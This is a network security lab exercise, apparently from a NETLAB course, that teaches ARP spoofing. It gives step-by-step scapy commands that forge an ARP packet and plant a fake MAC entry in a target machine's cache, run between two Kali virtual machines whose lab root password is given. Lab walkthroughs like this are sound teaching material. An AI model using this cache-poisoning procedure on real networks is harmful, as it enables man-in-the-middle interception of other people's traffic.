ARP Spoofing with scapy (NETLAB)

Purpose

We will craft a packet to add a fake cached ARP entry on the target computer. This is how man-in-the-middle attacks work. Understanding how ARP works is essential for network engineers and security professionals.

Finding the IP Address of the Attacker Machine

Open the Kali64 virtual machine. This is your Attacker machine. Log in as root with the password toor

This is your Attacker Machine.

Use this command to find your Attacker IP address:

ifconfig
Your Attacker IP address should be 172.16.1.202.

Finding the IP Address of the Target Machine

Open the Kali32 virtual machine. This is your Target machine. Log in as root with the password toor

This is your Target Machine.

Use this command to find your Target IP address:

ifconfig
Your Target IP address should be 172.16.1.203.

Sending PINGS to the Target Machine

On your Attacker machine, execute this command.
ping -c 3 172.16.1.202

Viewing the ARP Cache on the Target Machine

In order to send the pings, the two machines used ARP packets to exchange MAC addresses.

On the Target machine, and execute this command:

arp -n
The MAC address of the Attacker appears, as shown below.

Clearing the ARP Cache on the Target Machine

On the Target machine, and execute these commands:

ip -s -s neigh flush all

arp -n

The Attacker's MAC address is gone, as shown below.

Creating an ARP Packet with Scapy

On the Attacker Machine, execute these commands:
scapy

a = ARP()

a.display()

The attributes of the ARP object named "a" are displayed, as shown below on this page.

If the colors are difficult to see, adjust them by clicking Edit, "Profile Preferences", Colors. I used "Black on light yellow".

Sending a Malicious ARP from scapy

We'll send a crafted ARP packet to the Target, tricking it into adding a false MAC address to its ARP cache.

On the Attacker Machine, execute these commands.

In the first command, enter the IP address of your Target target machine.

The MAC and IP addresses in the second and third command are intentionally fake--leave them as they are.

The last MAC address is a broadcast address--leave it as it is.

a.pdst="172.16.1.203"

a.hwsrc="11:11:11:11:11:11"

a.psrc="1.1.1.1"

a.hwdst="ff:ff:ff:ff:ff:ff"

send(a)

The commands are shown in the figure below on this page.

Viewing the ARP Cache on the Target Machine

On the Target machine, execute this command:

arp -n
The fake entry should be visible, with an "Internet Address" of 1.1.1.1 and a "Physical Address" of 11-11-11-11-11-11, as shown below on this page.


Source

http://www.shelltoad.com/coding/arp-spoofing-with-scapy


Last modified: 5-1-12
Modified for NETLAB 6-9-16